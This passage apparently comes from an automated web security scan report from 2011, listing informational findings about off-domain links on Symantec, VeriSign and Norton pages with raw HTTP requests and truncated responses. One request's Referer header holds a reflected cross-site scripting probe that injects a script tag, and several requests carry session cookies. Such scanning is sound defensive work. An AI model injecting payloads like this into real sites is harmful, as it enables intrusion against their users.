https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp
https://www-secure.symantec.com/about/profile/policies/legal.jsp
https://www-secure.symantec.com/about/profile/policies/privacy.jsp
https://www-secure.symantec.com/css/20081218/business.css
https://www-secure.symantec.com/css/20090521/symantec.css
https://www-secure.symantec.com/feedback/contactus.jsp
https://www-secure.symantec.com/globalsites/index.jsp
https://www-secure.symantec.com/images/masthead/symantec.gif
https://www-secure.symantec.com/index.jsp
https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=
https://www-secure.symantec.com/rss/index.jsp
https://www-secure.symantec.com/script/20080114/swfobject.js
https://www-secure.symantec.com/script/omniture/om_code.js
https://www-secure.symantec.com/script/omniture/s_code.js
https://www-secure.symantec.com/scripts/icrossing/i2a.js
https://www-secure.symantec.com/sitemap/index.jsp
https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js
Request
GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1 Host: symantec-corporation.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL" Pragma: no-cache Cache-Control: no-cache, private Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 36800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Symantec Enterprise Sales Contact Center</title> <meta content="veritasnonconsumer" name="om.environment"...[SNIP]... <meta content="en/us: biz: contactcenter: form" name="om.page_name" /> <link rel="stylesheet" href="https://www-secure.symantec.com/css/20090521/symantec.css" /> <link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /> <script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"> </script>...[SNIP]... <!-- i2a tracking code--><script type="text/javascript" src="https://www-secure.symantec.com/scripts/icrossing/i2a.js"> </script>...[SNIP]... <div class="symLogo"><a href="https://www-secure.symantec.com/index.jsp"> <img title="Symantec Corporation | United States" alt="Symantec Corporation" src="https://www-secure.symantec.com/images/masthead/symantec.gif" /> </a>...[SNIP]... <span><a title="Site Map" href="https://www-secure.symantec.com/sitemap/index.jsp"> Site Map</a>...[SNIP]... 
<span><a title="Legal Notices" href="https://www-secure.symantec.com/about/profile/policies/legal.jsp"> Legal Notices</a>...[SNIP]... <span><a title="Privacy Policy" href="https://www-secure.symantec.com/about/profile/policies/privacy.jsp"> Privacy Policy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a title="Contact Us" onMouseOver="showdiv(4)" onMouseOut="hidediv(4)" href="https://www-secure.symantec.com/feedback/contactus.jsp"> Contact Us</a>...[SNIP]... <span><a title="Global Sites" href="https://www-secure.symantec.com/globalsites/index.jsp"> Global Sites</a>...[SNIP]... <span><a title="License Agreements" href="https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp"> License Agreements</a>...[SNIP]... <span><a title="RSS" href="https://www-secure.symantec.com/rss/index.jsp"> RSS</a>...[SNIP]... </p> <script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]...
14.42. https://trust-center.verisign.ch/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.ch
Path: /process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string: https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
The response contains the following links to other domains:
https://ssl.google-analytics.com/urchin.js
https://www.verisign.ch/repository/index.html
https://www.verisign.ch/repository/legal-notices.html
https://www.verisign.ch/repository/privacy.html
https://www.verisign.ch/ssl/buy-ssl-certificates/index.html
https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=371EA2F4DB2D10DB68CCA5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank"> Buy SSL Certificates >></a>...[SNIP]... <div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html"> Legal Notices</a>...[SNIP]... <div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html"> Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html"> Repository</a>...[SNIP]...
14.43. https://trust-center.verisign.com/process/retail/console_login
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string: https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US
The response contains the following links to other domains:
https://cert.webtrust.org/ViewSeal?id=304
https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:49 GMT Server: Apache Set-Cookie: TLTHID=38B3ED90DB2D10DB52A19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"> <img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">...[SNIP]...
14.44. https://trust-center.verisign.com/process/retail/trust_product_selector
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/trust_product_selector
Issue detail
The page was loaded from a URL containing a query string: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
The response contains the following links to other domains:
https://cert.webtrust.org/ViewSeal?id=304
https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]... </script> <script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"> <img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">...[SNIP]...
14.45. http://updatecenter.norton.com/
Summary
Severity: Information
Confidence: Certain
Host: http://updatecenter.norton.com
Path: /
Issue detail
The page was loaded from a URL containing a query string: http://updatecenter.norton.com/?NUCLANG=en
The response contains the following links to other domains:
http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0
http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150
http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272
http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc
http://www.facebook.com/Norton
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&font=&height=21&locale=en_US&ref=NortonUpdateCenter
Request
GET /?NUCLANG=en HTTP/1.1 Host: updatecenter.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:46:03 GMT Connection: close Content-Length: 25405 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr"> <head id="ctl00_Head1"><t...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc"> Norton Online Family</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc"> Norton Online Backup</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc"> Norton Management</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc"> Norton Safe Web</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc"> Norton Account</a>...[SNIP]... <li><a target="_blank" href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc"> Norton.com</a>...[SNIP]... <li><a href="http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0"> Leave Feedback</a>...[SNIP]... <li><a href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:ENG&ssdcat=270"> Customer Support</a>...[SNIP]... <div class="nortonFbLink"> <a target="_blank" href="http://www.facebook.com/Norton"> <span class="name">...[SNIP]... 
<div class="socialWidgets"> <iframe class="fbLikeIFrame" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FNorton&layout=button_count&show_faces=false&width=450&action=like&colorscheme=light&font=&height=21&locale=en_US&ref=NortonUpdateCenter" scrolling="no" frameborder="0" style="border: none; overflow: hidden; width: 160px; height: 21px;" allowtransparency="true"> </iframe>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=151'> Legal Notices</a>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328/?oslocale=iso:USA&plang=EN&oslang=iso:ENG&ssdcat=150'> Privacy Policy</a>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328/?SSDCAT=267&oslocale=iso:eng&oslang=iso:eng&plang=en&products=NUC&versions=2.0'> Leave Feedback</a>...[SNIP]... <li> <a target="_blank" href='http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=272'> License Agreements</a>...[SNIP]... <li><a class="footer-link" id="nof" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=261&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="nobu" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=262&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="nom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=281&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="safeweb" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=263&origin=nuc"> <span class="footer-tt">...[SNIP]... 
<li><a class="footer-link" id="na" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=264&origin=nuc"> <span class="footer-tt">...[SNIP]... <li><a class="footer-link" id="nortondotcom" target=_blank href="http://sitedirector.symantec.com/932743328?displocale=iso3:USA&displang=iso3:eng&ssdcat=266&origin=nuc"> <span class="footer-tt">...[SNIP]...
14.46. http://us.norton.com/beta/index.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /beta/index.jsp
Issue detail
The page was loaded from a URL containing a query string: http://us.norton.com/beta/index.jsp?inid=us_hho_homepage_hero4_2012beta
The response contains the following links to other domains:
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /beta/index.jsp?inid=us_hho_homepage_hero4_2012beta HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:30 GMT Content-Length: 24280 Connection: close Set-Cookie: JSESSIONID=942CFE17E15760F8032358C3716740F0; Path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Antivirus Free Software - Spyware Free Protection | Norton Beta Center</title> <meta http-equiv="Content-Type" cont...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.47. http://us.norton.com/beta/overview.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /beta/overview.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta
The response contains the following links to other domains:
http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both
http://twitter.com/norton_beta
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/privacy.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
http://www.twitter.com/norton_beta
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /beta/overview.jsp?pvid=n3605beta&inid=us_hho_homepage_hero4_n360v5beta HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Expires: Fri, 09 Sep 2011 21:47:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:47:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39170 <meta http-equiv="refresh" content="0;url=http://us.norton.com/beta"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Beta Software - Norton 360 Version...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <li><a href="http://sitedirector.symantec.com/932743328/?ssdcat=221&lcid=1033&serviceid=181&pname=N360&pversion=5.0&origin=thankyou&env=beta&layout=esd&tooltype=both" target="_blank"> Norton Recovery Tools</a>...[SNIP]... <div class="cbMrgnBtmMD">Please follow the <a href="http://www.twitter.com/norton_beta" target="_blank"> Norton Public Beta Twitter Account</a>...[SNIP]... l support on beta version software products. We do, however, value your feedback on features, usability, and bugs. All information submitted is routed through a secure server and is in compliance with <a href="http://www.symantec.com/about/profile/policies/privacy.jsp" target="_blank"> Symantec...s Privacy Policy</a>...[SNIP]... 
<div class="promoWdgt"><a href="http://twitter.com/norton_beta"> <img src="/content/en/us/home_homeoffice/images/promos/n-beta10-twitter-promo-b.gif" alt="Follow Norton on Twitter" title="Follow Norton on Twitter" class="imgFltTop " width="180" height="90"/>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.48. http://us.norton.com/norton-utilities/
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /norton-utilities/
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage
The response contains the following links to other domains:
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/norton/products/reviews/index.jsp
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://www.mynortonaccount.com/amsweb/default.do
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /norton-utilities/?inid=us_hho_homepage_hero3_nu2011pdpage HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=3501 Date: Fri, 09 Sep 2011 21:47:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 83835 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Registry Cleaners - Computer Startup Programs | Norton Utilities</title> <me...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... </div> <a href="http://www.symantec.com/norton/products/reviews/index.jsp" target="_blank"> Read more reviews</a>...[SNIP]... <li><a href="https://www.mynortonaccount.com/amsweb/default.do"> Access Norton Account</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... 
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.49. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /nortonlive/spyware-virus-removal.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://us.norton.com/nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks
The response contains the following links to other domains:
http://ads.bluelithium.com/pixel?id=1406631&t=2
http://bp.specificclick.net/?pixid=99068597
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs?cn=as&ActivityID=138499&ns=1
http://dm.demdex.net/pixel/19701
http://marchex.voicestar.com/euinc/number-changer.js
http://www.symantec.com/about/index.jsp
http://www.symantec.com/about/profile/policies/eulas/index.jsp
http://www.symantec.com/about/profile/policies/legal.jsp
http://www.symantec.com/about/profile/policies/repository.jsp
http://www.symantec.com/about/profile/privacypolicy/index.jsp
http://www.symantec.com/business/index.jsp
http://www.symantec.com/business/solutions/smallbusiness/index.jsp
http://www.symantec.com/content/en/us/about/media/nortonlive_tc.pdf
http://www.symantec.com/enterprise/contact_sales.jsp
http://www.symantec.com/enterprise/support/index.jsp
http://www.symantec.com/feedback/contactus.jsp
http://www.symantec.com/norton/support/DIY/index.jsp
http://www.symantec.com/norton/support/dtree.jsp?pvid=
http://www.symantec.com/partners/index.jsp
http://www.symantec.com/rss/index.jsp
http://www.symantec.com/sitemap/index.jsp
https://nortonlive.support.com/
https://www-secure.symantec.com/norton/support/contact/chat/nortonlive.jsp?chatexp=vss
https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
